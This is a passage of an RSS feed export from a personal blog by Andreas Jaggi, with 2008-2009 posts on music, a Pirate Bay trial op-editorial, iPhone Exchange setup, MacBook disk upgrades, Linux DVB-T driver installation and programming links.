  7155.    <creativeCommons:license></creativeCommons:license>
  7156.    <pubDate>Sat, 21 Feb 2009 13:28:00 +0100</pubDate>
  7157.    <category domain="">Music</category>
  7158.    <description><![CDATA[<p><strong>Tagada Jones &mdash; Une fois de plus (Industrial Version)</strong></p>
  7160. <p><a href="" title="Tagada Jones"><img src="" height="256" width="256" alt="Tagada Jones - 1 fois de plus" style="border: 0;"></a></p>
  7161. ]]></description>
  7162.    <content:encoded><![CDATA[<p><strong>Tagada Jones &mdash; Une fois de plus (Industrial Version)</strong></p>
  7164. <p><a href="" title="Tagada Jones"><img src="" height="256" width="256" alt="Tagada Jones - 1 fois de plus" style="border: 0;"></a></p>
  7165. ]]></content:encoded>
  7166.  </item>
  7168.  <item>
  7169.    <title>Music for a hard wake-up in the morning</title>
  7170.    <link></link>
  7171.    <guid isPermaLink="true"></guid>
  7172.    <dc:creator>Andreas Jaggi</dc:creator>
  7173.    <creativeCommons:license></creativeCommons:license>
  7174.    <pubDate>Thu, 19 Feb 2009 17:24:00 +0100</pubDate>
  7175.    <category domain="">Music</category>
  7176.    <description><![CDATA[<p><strong>Die Toten Hosen &mdash; Strom</strong></p>
  7178. <p><a href="" title="Die Toten Hosen - Strom - YouTube">Die Toten Hosen - Strom</a></p>
  7179. ]]></description>
  7180.    <content:encoded><![CDATA[<p><strong>Die Toten Hosen &mdash; Strom</strong></p>
  7182. <p><a href="" title="Die Toten Hosen - Strom - YouTube">Die Toten Hosen - Strom</a></p>
  7183. ]]></content:encoded>
  7184.  </item>
  7186.  <item>
  7187.    <title>The Pirate Bay Trial op-editorial</title>
  7188.    <link></link>
  7189.    <guid isPermaLink="true"></guid>
  7190.    <dc:creator>Andreas Jaggi</dc:creator>
  7191.    <creativeCommons:license></creativeCommons:license>
  7192.    <pubDate>Mon, 16 Feb 2009 20:46:00 +0100</pubDate>
  7193.    <category domain="">Misc</category>
  7194.    <description><![CDATA[<p>The trial against The Pirate Bay that started today in Stockholm, Sweden are one of the most important issues of our time. Our adversaries basically wants to close down internets and remodel it into something similar of a sodamachine serving entertainment. During the trial, the prosecutor together with a coterie of representatives for a disabled business model will put up a tacky theater by telling stories designed to convince the court that The Pirate Bay infact is a menace to society.</p>
  7196. <p>What differs this trial from most earlier trials is that everything in and surrounding it will whirl round and round in diverse channels of communication; to be discussed, reinterpreted, copied and critizised. Every crack in their appeal will be penetrated by the gaze of thousands upon thousands of eyes on the internets, in all the channels covering the trial. Old cliches from the antipiracy lobby wont stick. You won’t be able to say stuff like, ”you can’t compete with free” or ”filesharing is theft” without a thousand voices making fun of you.</p>
  7198. <p>We will create numerous scenes where quite different plays will take place. In local channels like where the immediate physical surroundings of the court are being discussed. ”Which cafés nearby will give us connection?” ”How can we get electricity to the bus?” But also in international channels like Twitter, where right now the torrent of information is being translated into fifteen different languages. Translations and coverage being made by ordinary users of internets. Volunteers sign up to make trial-tourist guides to the surroundings, drive the bus or hook up audio. People fly in from far away countries to cover the trial and tell the world their video story of the Sweden they see.</p>
  7200. <p>Here all participants are potential actors in the Spectrial. Our channels form a meltingpot of reporting and engagement.</p>
  7202. <p>Our communication around the spectacle aims in no way towards an objective report on an external chain of events. Rather, the trial is a hub around which a whole new network of actors is instigated. Neither is the spectacle a question of old media against digital, social medias. Our social medias include a paper fanzine and a 32 year old bus, connecting us and others physically.</p>
  7204. <p>It’s not about the protocols nor the technology. It’s about using these to create new congregations, where anyone is invited and anyone can find their role, build new scenes and make their own performances.</p>
  7206. <p>The future is built by us. Us who participate in conversations. The future is built by us who explore how information and performativity is coming together. To refuse a debate and still expect to be able to charge consumers is since long a closed door. To also try and outlaw certain types of conversations is downright disgraceful.</p>
  7208. <p>The coverage of the trial is not unique in these qualities. More and more areas see the creation of conversations on and the exploration of new stances on culture and cultural economy. A gigantic collective exploration has set sails. Every route differs from the other. But they have one thing in common: The industry interests that the state is representing are never present in these conversations. This is why they wont be part in building the future.</p>
  7210. <p>maintain hardline kopimi</p>
  7212. <p>The Bureau for Piracy and The Pirate Bay<br>
  7214. via the internets</p>
  7216. <p>this article was translated by proud peers of The Pirate Bay
  7220. <p>
  7222. (<a href="" title="Publish as us, in your country (">via</a>)
  7224. </p>
  7225. ]]></description>
  7226.    <content:encoded><![CDATA[<p>The trial against The Pirate Bay that started today in Stockholm, Sweden are one of the most important issues of our time. Our adversaries basically wants to close down internets and remodel it into something similar of a sodamachine serving entertainment. During the trial, the prosecutor together with a coterie of representatives for a disabled business model will put up a tacky theater by telling stories designed to convince the court that The Pirate Bay infact is a menace to society.</p>
  7228. <p>What differs this trial from most earlier trials is that everything in and surrounding it will whirl round and round in diverse channels of communication; to be discussed, reinterpreted, copied and critizised. Every crack in their appeal will be penetrated by the gaze of thousands upon thousands of eyes on the internets, in all the channels covering the trial. Old cliches from the antipiracy lobby wont stick. You won’t be able to say stuff like, ”you can’t compete with free” or ”filesharing is theft” without a thousand voices making fun of you.</p>
  7230. <p>We will create numerous scenes where quite different plays will take place. In local channels like where the immediate physical surroundings of the court are being discussed. ”Which cafés nearby will give us connection?” ”How can we get electricity to the bus?” But also in international channels like Twitter, where right now the torrent of information is being translated into fifteen different languages. Translations and coverage being made by ordinary users of internets. Volunteers sign up to make trial-tourist guides to the surroundings, drive the bus or hook up audio. People fly in from far away countries to cover the trial and tell the world their video story of the Sweden they see.</p>
  7232. <p>Here all participants are potential actors in the Spectrial. Our channels form a meltingpot of reporting and engagement.</p>
  7234. <p>Our communication around the spectacle aims in no way towards an objective report on an external chain of events. Rather, the trial is a hub around which a whole new network of actors is instigated. Neither is the spectacle a question of old media against digital, social medias. Our social medias include a paper fanzine and a 32 year old bus, connecting us and others physically.</p>
  7236. <p>It’s not about the protocols nor the technology. It’s about using these to create new congregations, where anyone is invited and anyone can find their role, build new scenes and make their own performances.</p>
  7238. <p>The future is built by us. Us who participate in conversations. The future is built by us who explore how information and performativity is coming together. To refuse a debate and still expect to be able to charge consumers is since long a closed door. To also try and outlaw certain types of conversations is downright disgraceful.</p>
  7240. <p>The coverage of the trial is not unique in these qualities. More and more areas see the creation of conversations on and the exploration of new stances on culture and cultural economy. A gigantic collective exploration has set sails. Every route differs from the other. But they have one thing in common: The industry interests that the state is representing are never present in these conversations. This is why they wont be part in building the future.</p>
  7242. <p>maintain hardline kopimi</p>
  7244. <p>The Bureau for Piracy and The Pirate Bay<br>
  7246. via the internets</p>
  7248. <p>this article was translated by proud peers of The Pirate Bay
  7252. <p>
  7254. (<a href="" title="Publish as us, in your country (">via</a>)
  7256. </p>
  7257. ]]></content:encoded>
  7258.  </item>
  7260.  <item>
  7261.    <title>1234567890</title>
  7262.    <link></link>
  7263.    <guid isPermaLink="true"></guid>
  7264.    <dc:creator>Andreas Jaggi</dc:creator>
  7265.    <creativeCommons:license></creativeCommons:license>
  7266.    <pubDate>Sat, 14 Feb 2009 00:31:00 +0100</pubDate>
  7267.    <category domain="">Misc</category>
  7268.    <description><![CDATA[<p><a href="" title="1234567890"></a></p>
  7269. ]]></description>
  7270.    <content:encoded><![CDATA[<p><a href="" title="1234567890"></a></p>
  7271. ]]></content:encoded>
  7272.  </item>
  7274.  <item>
  7275.    <title>Unicode Snowman</title>
  7276.    <link></link>
  7277.    <guid isPermaLink="true"></guid>
  7278.    <dc:creator>Andreas Jaggi</dc:creator>
  7279.    <creativeCommons:license></creativeCommons:license>
  7280.    <pubDate>Thu, 09 Oct 2008 15:50:00 +0200</pubDate>
  7281.    <category domain="">Misc</category>
  7282.    <description><![CDATA[<p style="font-size: 200px;">&#9731;</p>
  7284. <p><a href="" title="Unicode Snowman for You">via</a></p>
  7285. ]]></description>
  7286.    <content:encoded><![CDATA[<p style="font-size: 200px;">&#9731;</p>
  7288. <p><a href="" title="Unicode Snowman for You">via</a></p>
  7289. ]]></content:encoded>
  7290.  </item>
  7292.  <item>
  7293.    <title>Use EPFL Exchange on the iPhone / iPod touch</title>
  7294.    <link></link>
  7295.    <guid isPermaLink="true"></guid>
  7296.    <dc:creator>Andreas Jaggi</dc:creator>
  7297.    <creativeCommons:license></creativeCommons:license>
  7298.    <pubDate>Thu, 04 Sep 2008 19:59:00 +0200</pubDate>
  7299.    <category domain="">Misc</category>
  7300.    <description><![CDATA[<p>As EPFL is migrating all its E-Mail services to Exchange, lets use the Exchange functionalities of the iPhone/iPod touch.<br>Here's the configuration to make it work:</p>
  7302. <ul>
  7304. <li>E-Mail:</li>
  7306. <li>Server:</li>
  7308. <li>Username: studentsusername</li>
  7310. <li>Password: ********************</li>
  7312. </ul>
  7313. ]]></description>
  7314.    <content:encoded><![CDATA[<p>As EPFL is migrating all its E-Mail services to Exchange, lets use the Exchange functionalities of the iPhone/iPod touch.<br>Here's the configuration to make it work:</p>
  7316. <ul>
  7318. <li>E-Mail:</li>
  7320. <li>Server:</li>
  7322. <li>Username: studentsusername</li>
  7324. <li>Password: ********************</li>
  7326. </ul>
  7327. ]]></content:encoded>
  7328.  </item>
  7330.  <item>
  7331.    <title>Disc of this Summer: La Phaze - Miracle</title>
  7332.    <link></link>
  7333.    <guid isPermaLink="true"></guid>
  7334.    <dc:creator>Andreas Jaggi</dc:creator>
  7335.    <creativeCommons:license></creativeCommons:license>
  7336.    <pubDate>Thu, 21 Aug 2008 06:31:00 +0200</pubDate>
  7337.    <category domain="">Music</category>
  7338.    <description><![CDATA[<p><a href=""><img src="" height="240" width="240" style="border: 0;" alt="La Phaze - Miracle"></a></p>
  7339. ]]></description>
  7340.    <content:encoded><![CDATA[<p><a href=""><img src="" height="240" width="240" style="border: 0;" alt="La Phaze - Miracle"></a></p>
  7341. ]]></content:encoded>
  7342.  </item>
  7344.  <item>
  7345.    <title>Opera 9.25 vs Safari JavaScript syntax error forgiveness</title>
  7346.    <link></link>
  7347.    <guid isPermaLink="true"></guid>
  7348.    <dc:creator>Andreas Jaggi</dc:creator>
  7349.    <creativeCommons:license></creativeCommons:license>
  7350.    <pubDate>Sat, 09 Aug 2008 01:15:00 +0200</pubDate>
  7351.    <category domain="">Coding</category>
  7352.    <description><![CDATA[<p>The following definition of an Array works without problems in Safari (and probably Firefox too), but triggers an (legitimate) error in Opera 9.25:</p>
  7354. <pre>var myArray = [
  7356. 1.2,
  7358. 2.3,
  7360. 3.4,
  7362. ];</pre>
  7364. <p>The error is triggered by the superfluous comma after the last element of the Array. It may be argued for both behaviors, but I would prefer all Browsers accepting such an Array definition also since in other languages (C, Python, PHP) such a redundant comma does not cause any trouble.</p>
  7365. ]]></description>
  7366.    <content:encoded><![CDATA[<p>The following definition of an Array works without problems in Safari (and probably Firefox too), but triggers an (legitimate) error in Opera 9.25:</p>
  7368. <pre>var myArray = [
  7370. 1.2,
  7372. 2.3,
  7374. 3.4,
  7376. ];</pre>
  7378. <p>The error is triggered by the superfluous comma after the last element of the Array. It may be argued for both behaviors, but I would prefer all Browsers accepting such an Array definition also since in other languages (C, Python, PHP) such a redundant comma does not cause any trouble.</p>
  7379. ]]></content:encoded>
  7380.  </item>
  7382.  <item>
  7383.    <title>Fast disk upgrade for my MacBook Pro</title>
  7384.    <link></link>
  7385.    <guid isPermaLink="true"></guid>
  7386.    <dc:creator>Andreas Jaggi</dc:creator>
  7387.    <creativeCommons:license></creativeCommons:license>
  7388.    <pubDate>Sat, 02 Aug 2008 07:58:00 +0200</pubDate>
  7389.    <category domain="">Mac</category>
  7390.    <description><![CDATA[<p>Here's how to upgrade the disk of a MacBook Pro in 45 minutes while keeping all your data/settings/applications:</p>
  7392. <ol>
  7394. <li>Uninstall <a href="" title="rEFIt - An EFI Boot Menu and Toolkit">rEFIt</a> and make sure your MBP restarts with the Apple 'default' bootloader</li>
  7396. <li>Follow the <a href="" title="Fixit Guide - DIY PowerBook, MacBook, &amp; iBook Repair &amp; Disassembly">iFixit Guide</a> to replace your disk</li>
  7398. <li>Put the old disk in a SATA-to-USB case (they are available for $7.89 from <a href=""></a>)</li>
  7400. <li>Connect the old disk to your MBP and turn the MBP on. (The MBP automagically recognizes the old system and runs it)</li>
  7402. <li>Open the Disk Manager and partition your new disk.</li>
  7404. <li>Select your new 'system' Volume and open the "Restore" tab.</li>
  7406. <li>Drag your old 'system' Volume to the "Source" field and your new 'system' Volume to the "Target" field. Click on "Restore", the contents of your old disk are now copied to the new disk.</li>
  7408. <li>After the restore process finishes, shutdown your MBP.</li>
  7410. <li>Disconnect your old disk and turn on your MBP.</li>
  7412. <li>Voilà. You are booting from the new disk and all your data/settings/applications are there too!</li>
  7414. </ol>
  7415. ]]></description>
  7416.    <content:encoded><![CDATA[<p>Here's how to upgrade the disk of a MacBook Pro in 45 minutes while keeping all your data/settings/applications:</p>
  7418. <ol>
  7420. <li>Uninstall <a href="" title="rEFIt - An EFI Boot Menu and Toolkit">rEFIt</a> and make sure your MBP restarts with the Apple 'default' bootloader</li>
  7422. <li>Follow the <a href="" title="Fixit Guide - DIY PowerBook, MacBook, &amp; iBook Repair &amp; Disassembly">iFixit Guide</a> to replace your disk</li>
  7424. <li>Put the old disk in a SATA-to-USB case (they are available for $7.89 from <a href=""></a>)</li>
  7426. <li>Connect the old disk to your MBP and turn the MBP on. (The MBP automagically recognizes the old system and runs it)</li>
  7428. <li>Open the Disk Manager and partition your new disk.</li>
  7430. <li>Select your new 'system' Volume and open the "Restore" tab.</li>
  7432. <li>Drag your old 'system' Volume to the "Source" field and your new 'system' Volume to the "Target" field. Click on "Restore", the contents of your old disk are now copied to the new disk.</li>
  7434. <li>After the restore process finishes, shutdown your MBP.</li>
  7436. <li>Disconnect your old disk and turn on your MBP.</li>
  7438. <li>Voilà. You are booting from the new disk and all your data/settings/applications are there too!</li>
  7440. </ol>
  7441. ]]></content:encoded>
  7442.  </item>
  7444.  <item>
  7445.    <title>Handy Photos</title>
  7446.    <link></link>
  7447.    <guid isPermaLink="true"></guid>
  7448.    <dc:creator>Andreas Jaggi</dc:creator>
  7449.    <creativeCommons:license></creativeCommons:license>
  7450.    <pubDate>Sat, 19 Jul 2008 15:42:00 +0200</pubDate>
  7451.    <category domain="">Misc</category>
  7452.    <description><![CDATA[<a href=""><img src="" alt="handy-scaled-0.jpg"></a><br>
  7454. <a href=""><img src="" alt="handy-scaled-1.jpg"></a><br>
  7456. <a href=""><img src="" alt="handy-scaled-12.jpg"></a><br>
  7458. <a href=""><img src="" alt="handy-scaled-23.jpg"></a><br>
  7460. <a href=""><img src="" alt="handy-scaled-34.jpg"></a><br>
  7462. <a href=""><img src="" alt="handy-scaled-42.jpg"></a><br>
  7464. <a href=""><img src="" alt="handy-scaled-43.jpg"></a><br>
  7466. <a href=""><img src="" alt="handy-scaled-44.jpg"></a><br>
  7468. <a href=""><img src="" alt="handy-scaled-45.jpg"></a><br>
  7470. <a href=""><img src="" alt="handy-scaled-46.jpg"></a><br>
  7472. <a href=""><img src="" alt="handy-scaled-2.jpg"></a><br>
  7474. <a href=""><img src="" alt="handy-scaled-3.jpg"></a><br>
  7476. <a href=""><img src="" alt="handy-scaled-4.jpg"></a><br>
  7478. <a href=""><img src="" alt="handy-scaled-5.jpg"></a><br>
  7480. <a href=""><img src="" alt="handy-scaled-6.jpg"></a><br>
  7482. <a href=""><img src="" alt="handy-scaled-7.jpg"></a><br>
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  7488. <a href=""><img src="" alt="handy-scaled-10.jpg"></a><br>
  7490. <a href=""><img src="" alt="handy-scaled-11.jpg"></a><br>
  7492. <a href=""><img src="" alt="handy-scaled-13.jpg"></a><br>
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  7514. <a href=""><img src="" alt="handy-scaled-25.jpg"></a><br>
  7516. <a href=""><img src="" alt="handy-scaled-26.jpg"></a><br>
  7518. <a href=""><img src="" alt="handy-scaled-27.jpg"></a><br>
  7520. <a href=""><img src="" alt="handy-scaled-28.jpg"></a><br>
  7522. <a href=""><img src="" alt="handy-scaled-29.jpg"></a><br>
  7524. <a href=""><img src="" alt="handy-scaled-30.jpg"></a><br>
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  7530. <a href=""><img src="" alt="handy-scaled-33.jpg"></a><br>
  7532. <a href=""><img src="" alt="handy-scaled-35.jpg"></a><br>
  7534. <a href=""><img src="" alt="handy-scaled-36.jpg"></a><br>
  7536. <a href=""><img src="" alt="handy-scaled-37.jpg"></a><br>
  7538. <a href=""><img src="" alt="handy-scaled-38.jpg"></a><br>
  7540. <a href=""><img src="" alt="handy-scaled-39.jpg"></a><br>
  7542. <a href=""><img src="" alt="handy-scaled-40.jpg"></a><br>
  7544. <a href=""><img src="" alt="handy-scaled-41.jpg"></a><br>
  7545. ]]></description>
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  7548. <a href=""><img src="" alt="handy-scaled-1.jpg"></a><br>
  7550. <a href=""><img src="" alt="handy-scaled-12.jpg"></a><br>
  7552. <a href=""><img src="" alt="handy-scaled-23.jpg"></a><br>
  7554. <a href=""><img src="" alt="handy-scaled-34.jpg"></a><br>
  7556. <a href=""><img src="" alt="handy-scaled-42.jpg"></a><br>
  7558. <a href=""><img src="" alt="handy-scaled-43.jpg"></a><br>
  7560. <a href=""><img src="" alt="handy-scaled-44.jpg"></a><br>
  7562. <a href=""><img src="" alt="handy-scaled-45.jpg"></a><br>
  7564. <a href=""><img src="" alt="handy-scaled-46.jpg"></a><br>
  7566. <a href=""><img src="" alt="handy-scaled-2.jpg"></a><br>
  7568. <a href=""><img src="" alt="handy-scaled-3.jpg"></a><br>
  7570. <a href=""><img src="" alt="handy-scaled-4.jpg"></a><br>
  7572. <a href=""><img src="" alt="handy-scaled-5.jpg"></a><br>
  7574. <a href=""><img src="" alt="handy-scaled-6.jpg"></a><br>
  7576. <a href=""><img src="" alt="handy-scaled-7.jpg"></a><br>
  7578. <a href=""><img src="" alt="handy-scaled-8.jpg"></a><br>
  7580. <a href=""><img src="" alt="handy-scaled-9.jpg"></a><br>
  7582. <a href=""><img src="" alt="handy-scaled-10.jpg"></a><br>
  7584. <a href=""><img src="" alt="handy-scaled-11.jpg"></a><br>
  7586. <a href=""><img src="" alt="handy-scaled-13.jpg"></a><br>
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  7600. <a href=""><img src="" alt="handy-scaled-20.jpg"></a><br>
  7602. <a href=""><img src="" alt="handy-scaled-21.jpg"></a><br>
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  7606. <a href=""><img src="" alt="handy-scaled-24.jpg"></a><br>
  7608. <a href=""><img src="" alt="handy-scaled-25.jpg"></a><br>
  7610. <a href=""><img src="" alt="handy-scaled-26.jpg"></a><br>
  7612. <a href=""><img src="" alt="handy-scaled-27.jpg"></a><br>
  7614. <a href=""><img src="" alt="handy-scaled-28.jpg"></a><br>
  7616. <a href=""><img src="" alt="handy-scaled-29.jpg"></a><br>
  7618. <a href=""><img src="" alt="handy-scaled-30.jpg"></a><br>
  7620. <a href=""><img src="" alt="handy-scaled-31.jpg"></a><br>
  7622. <a href=""><img src="" alt="handy-scaled-32.jpg"></a><br>
  7624. <a href=""><img src="" alt="handy-scaled-33.jpg"></a><br>
  7626. <a href=""><img src="" alt="handy-scaled-35.jpg"></a><br>
  7628. <a href=""><img src="" alt="handy-scaled-36.jpg"></a><br>
  7630. <a href=""><img src="" alt="handy-scaled-37.jpg"></a><br>
  7632. <a href=""><img src="" alt="handy-scaled-38.jpg"></a><br>
  7634. <a href=""><img src="" alt="handy-scaled-39.jpg"></a><br>
  7636. <a href=""><img src="" alt="handy-scaled-40.jpg"></a><br>
  7638. <a href=""><img src="" alt="handy-scaled-41.jpg"></a><br>
  7639. ]]></content:encoded>
  7640.  </item>
  7642.  <item>
  7643.    <title>helloworld.c</title>
  7644.    <link></link>
  7645.    <guid isPermaLink="true"></guid>
  7646.    <dc:creator>Andreas Jaggi</dc:creator>
  7647.    <creativeCommons:license></creativeCommons:license>
  7648.    <pubDate>Wed, 25 Jun 2008 21:40:00 +0200</pubDate>
  7649.    <category domain="">Coding</category>
  7650.    <description><![CDATA[<pre>void main(){puts("Hello World.\n");}</pre>
  7651. ]]></description>
  7652.    <content:encoded><![CDATA[<pre>void main(){puts("Hello World.\n");}</pre>
  7653. ]]></content:encoded>
  7654.  </item>
  7656.  <item>
  7658.    <link></link>
  7659.    <guid isPermaLink="true"></guid>
  7660.    <dc:creator>Andreas Jaggi</dc:creator>
  7661.    <creativeCommons:license></creativeCommons:license>
  7662.    <pubDate>Fri, 09 May 2008 17:52:00 +0200</pubDate>
  7663.    <category domain="">Music</category>
  7664.    <description><![CDATA[<p><b>Qu'en est-il de Noir Désir?</b></p>
  7666. <blockquote cite=""><p>
  7668. On s'est remis au boulot. On projette d'enregistrer un album durant l'hiver prochain&hellip; C'est court, mais on a besoin d'une échéance pour se structurer.</p>
  7670. </blockquote>
  7672. <p>(<a href="">via</a>)</p>
  7673. ]]></description>
  7674.    <content:encoded><![CDATA[<p><b>Qu'en est-il de Noir Désir?</b></p>
  7676. <blockquote cite=""><p>
  7678. On s'est remis au boulot. On projette d'enregistrer un album durant l'hiver prochain&hellip; C'est court, mais on a besoin d'une échéance pour se structurer.</p>
  7680. </blockquote>
  7682. <p>(<a href="">via</a>)</p>
  7683. ]]></content:encoded>
  7684.  </item>
  7686.  <item>
  7687.    <title>Vim links</title>
  7688.    <link></link>
  7689.    <guid isPermaLink="true"></guid>
  7690.    <dc:creator>Andreas Jaggi</dc:creator>
  7691.    <creativeCommons:license></creativeCommons:license>
  7692.    <pubDate>Sun, 04 May 2008 08:23:00 +0200</pubDate>
  7693.    <category domain="">Linux</category>
  7694.    <description><![CDATA[<ul>
  7696. <li><a href="">VIM as a Diff/Merge Tool</a></li>
  7698. <li><a href="">10 Easy Steps to Becoming a Vim Expert</a></li>
  7700. <li><a href="">vim As A Personal Wiki</a></li>
  7702. </ul>
  7703. ]]></description>
  7704.    <content:encoded><![CDATA[<ul>
  7706. <li><a href="">VIM as a Diff/Merge Tool</a></li>
  7708. <li><a href="">10 Easy Steps to Becoming a Vim Expert</a></li>
  7710. <li><a href="">vim As A Personal Wiki</a></li>
  7712. </ul>
  7713. ]]></content:encoded>
  7714.  </item>
  7716.  <item>
  7717.    <title>Sleep deprivation - Sat Rocks On The Second Floor</title>
  7718.    <link></link>
  7719.    <guid isPermaLink="true"></guid>
  7720.    <dc:creator>Andreas Jaggi</dc:creator>
  7721.    <creativeCommons:license></creativeCommons:license>
  7722.    <pubDate>Fri, 02 May 2008 15:25:00 +0200</pubDate>
  7723.    <category domain="">Misc</category>
  7724.    <description><![CDATA[<p>Right after two nights with 4 hours of sleep in total (<a href="">Sat Rocks On The Second Floor!</a>), I stumble over this article: <a href="">Sleep deprivation is not a badge of honor</a>. :-)</p>
  7725. ]]></description>
  7726.    <content:encoded><![CDATA[<p>Right after two nights with 4 hours of sleep in total (<a href="">Sat Rocks On The Second Floor!</a>), I stumble over this article: <a href="">Sleep deprivation is not a badge of honor</a>. :-)</p>
  7727. ]]></content:encoded>
  7728.  </item>
  7730.  <item>
  7731.    <title>Seems people don't read enough books</title>
  7732.    <link></link>
  7733.    <guid isPermaLink="true"></guid>
  7734.    <dc:creator>Andreas Jaggi</dc:creator>
  7735.    <creativeCommons:license></creativeCommons:license>
  7736.    <pubDate>Wed, 30 Apr 2008 14:23:00 +0200</pubDate>
  7737.    <category domain="">Coding</category>
  7738.    <description><![CDATA[<p><a href="">Coding Horror: Programmers Don't Read Books -- But You Should</a></p>
  7739. ]]></description>
  7740.    <content:encoded><![CDATA[<p><a href="">Coding Horror: Programmers Don't Read Books -- But You Should</a></p>
  7741. ]]></content:encoded>
  7742.  </item>
  7744.  <item>
  7745.    <title>Gigabyte U7000 USB DTV DVB-T and Ubuntu (8.04)</title>
  7746.    <link></link>
  7747.    <guid isPermaLink="true"></guid>
  7748.    <dc:creator>Andreas Jaggi</dc:creator>
  7749.    <creativeCommons:license></creativeCommons:license>
  7750.    <pubDate>Mon, 28 Apr 2008 20:45:00 +0200</pubDate>
  7751.    <category domain="">Linux</category>
  7752.    <description><![CDATA[<ol>
  7754. <li><code>sudo apt-get install kaffeine dvb-utils mercurial linux-headers-$(uname -r) build-essential</code></li>
  7756. <li><code>hg clone</code></li>
  7758. <li><code>cd v4l-dvb</code></li>
  7760. <li><code>sudo make</code></li>
  7762. <li><code>sudo make install</code></li>
  7764. </ol>
  7766. <p>
  7768. If you're using another flavor of Linux or Ubuntu you may be missing the firmware file, you can get it <a href="">here</a>.
  7770. </p>
  7772. <img src="" height="288" width="512" alt="DVB-T screenshot">
  7773. ]]></description>
  7774.    <content:encoded><![CDATA[<ol>
  7776. <li><code>sudo apt-get install kaffeine dvb-utils mercurial linux-headers-$(uname -r) build-essential</code></li>
  7778. <li><code>hg clone</code></li>
  7780. <li><code>cd v4l-dvb</code></li>
  7782. <li><code>sudo make</code></li>
  7784. <li><code>sudo make install</code></li>
  7786. </ol>
  7788. <p>
  7790. If you're using another flavor of Linux or Ubuntu you may be missing the firmware file, you can get it <a href="">here</a>.
  7792. </p>
  7794. <img src="" height="288" width="512" alt="DVB-T screenshot">
  7795. ]]></content:encoded>
  7796.  </item>
  7798.  <item>
  7799.    <title>Musikverwaltung unter Linux</title>
  7800.    <link></link>
  7801.    <guid isPermaLink="true"></guid>
  7802.    <dc:creator>Andreas Jaggi</dc:creator>
  7803.    <creativeCommons:license></creativeCommons:license>
  7804.    <pubDate>Mon, 28 Apr 2008 11:01:00 +0200</pubDate>
  7805.    <category domain="">Linux</category>
  7806.    <description><![CDATA[<a href="">Pro-Linux: Musikverwaltung unter Linux, ein Vergleich verschiedener Programme</a>
  7807. ]]></description>
  7808.    <content:encoded><![CDATA[<a href="">Pro-Linux: Musikverwaltung unter Linux, ein Vergleich verschiedener Programme</a>
  7809. ]]></content:encoded>
  7810.  </item>
  7812.  <item>
  7813.    <title>Python (S60) links</title>
  7814.    <link></link>
  7815.    <guid isPermaLink="true"></guid>
  7816.    <dc:creator>Andreas Jaggi</dc:creator>
  7817.    <creativeCommons:license></creativeCommons:license>
  7818.    <pubDate>Wed, 23 Apr 2008 00:12:00 +0200</pubDate>
  7819.    <category domain="">Coding</category>
  7820.    <description><![CDATA[<ul>
  7822. <li><a href=";S_TACT=105AGX59&amp;S_CMP=GR">Using Python to create UNIX command line tools</a></li>
  7824. <li><a href="">PyS60 Emulation Library</a>, unlike the Nokia Emulator, this one also works on Mac OS X and Linux!</li>
  7826. <li><a href="">Wlan Scanning module for PyS60</a>. There is also an extended GSM location module to get more information (Technology used, Name of Operator, Network Mode, &hellip;) than with the Nokia one.</li>
  7828. </ul>
  7829. ]]></description>
  7830.    <content:encoded><![CDATA[<ul>
  7832. <li><a href=";S_TACT=105AGX59&amp;S_CMP=GR">Using Python to create UNIX command line tools</a></li>
  7834. <li><a href="">PyS60 Emulation Library</a>, unlike the Nokia Emulator, this one also works on Mac OS X and Linux!</li>
  7836. <li><a href="">Wlan Scanning module for PyS60</a>. There is also an extended GSM location module to get more information (Technology used, Name of Operator, Network Mode, &hellip;) than with the Nokia one.</li>
  7838. </ul>
  7839. ]]></content:encoded>
  7840.  </item>
  7842.  <item>
  7843.    <title>ImageFlow</title>
  7844.    <link></link>
  7845.    <guid isPermaLink="true"></guid>
  7846.    <dc:creator>Andreas Jaggi</dc:creator>
  7847.    <creativeCommons:license></creativeCommons:license>
  7848.    <pubDate>Mon, 21 Apr 2008 21:31:00 +0200</pubDate>
  7849.    <category domain="">Webdesign</category>
  7850.    <description><![CDATA[<p><a href="">ImageFlow</a>, CoverFlow mit JavaScript. (<a href="">via</a>)</p>
  7851. ]]></description>
  7852.    <content:encoded><![CDATA[<p><a href="">ImageFlow</a>, CoverFlow mit JavaScript. (<a href="">via</a>)</p>
  7853. ]]></content:encoded>
  7854.  </item>
  7856.  <item>
  7857.    <title> - Web-IRC-Client</title>
  7858.    <link></link>
  7859.    <guid isPermaLink="true"></guid>
  7860.    <dc:creator>Andreas Jaggi</dc:creator>
  7861.    <creativeCommons:license></creativeCommons:license>
  7862.    <pubDate>Mon, 21 Apr 2008 21:21:00 +0200</pubDate>
  7863.    <category domain="">Networking</category>
  7864.    <description><![CDATA[<p><a href=""></a> provides an IRC webinterface, so you can hang around in your favorite channels with your iPhone/PDA/fridge/whatever.</p>
  7865. ]]></description>
  7866.    <content:encoded><![CDATA[<p><a href=""></a> provides an IRC webinterface, so you can hang around in your favorite channels with your iPhone/PDA/fridge/whatever.</p>
  7867. ]]></content:encoded>
  7868.  </item>
  7870.  <item>
  7871.    <title>Ten Thousand Cents</title>
  7872.    <link></link>
  7873.    <guid isPermaLink="true"></guid>
  7874.    <dc:creator>Andreas Jaggi</dc:creator>
  7875.    <creativeCommons:license></creativeCommons:license>
  7876.    <pubDate>Tue, 15 Apr 2008 21:18:00 +0200</pubDate>
  7877.    <category domain="">Misc</category>
  7878.    <description><![CDATA[<a href=""></a>
  7879. ]]></description>
  7880.    <content:encoded><![CDATA[<a href=""></a>
  7881. ]]></content:encoded>
  7882.  </item>
  7884.  <item>
  7885.    <title>Using the X11 clipboard on the commandline</title>
  7886.    <link></link>
  7887.    <guid isPermaLink="true"></guid>
  7888.    <dc:creator>Andreas Jaggi</dc:creator>
  7889.    <creativeCommons:license></creativeCommons:license>
  7890.    <pubDate>Tue, 25 Mar 2008 14:27:00 +0100</pubDate>
  7891.    <category domain="">Linux</category>
  7892.    <description><![CDATA[<p><a href="">XSel</a> gives easy commandline access to the X11 clipboard (primary &amp; secondary).</p>
  7893. ]]></description>
  7894.    <content:encoded><![CDATA[<p><a href="">XSel</a> gives easy commandline access to the X11 clipboard (primary &amp; secondary).</p>
  7895. ]]></content:encoded>
  7896.  </item>
  7898.  <item>
  7899.    <title>Unix Toolbox</title>
  7900.    <link></link>
  7901.    <guid isPermaLink="true"></guid>
  7902.    <dc:creator>Andreas Jaggi</dc:creator>
  7903.    <creativeCommons:license></creativeCommons:license>
  7904.    <pubDate>Sun, 23 Mar 2008 16:36:00 +0100</pubDate>
  7905.    <category domain="">Linux</category>
